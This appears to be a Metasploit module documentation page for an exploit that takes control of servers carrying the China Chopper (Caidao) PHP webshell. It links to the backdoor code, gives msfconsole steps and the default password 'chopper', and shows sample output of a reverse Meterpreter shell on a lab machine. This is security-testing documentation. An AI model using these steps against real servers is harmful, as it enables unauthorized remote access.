## Vulnerable Application

China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) is a webshell manager coded in PHP.

Here is the [PHP code](https://github.com/rapid7/metasploit-framework/files/430643/caidao.zip) of the backdoor that you can use and save it as caidao.php.

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: `use exploit/multi/http/caidao_php_backdoor_exec`
  4. Do: `set rport port`
  5. Do: `set rhost ip`
  6. Do: `check`
```
[+] 192.168.1.103:80 - The target is vulnerable.
```
  8. Do: `exploit`
  9. You should get a shell.

## Options

  **TARGETURI**

  TARGETURI by default is `/caidao.php`, which is the common filename of the backdoor.
  
  **PASSWORD**
  
  PASSWORD by default is `chopper`, which is the password of the backdoor.

## Scenarios

```
msf exploit(caidao_php_backdoor_exec) > exploit

[*] Started reverse handler on 192.168.1.108:4444 
[*] Sending stage (33068 bytes) to 192.168.1.103
[*] Meterpreter session 2 opened (192.168.1.108:4444 -> 192.168.1.103:42349) at 2015-11-02 09:05:54 +0000

meterpreter > sysinfo 
Computer    : kali
OS          : Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686
Meterpreter : php/php
```
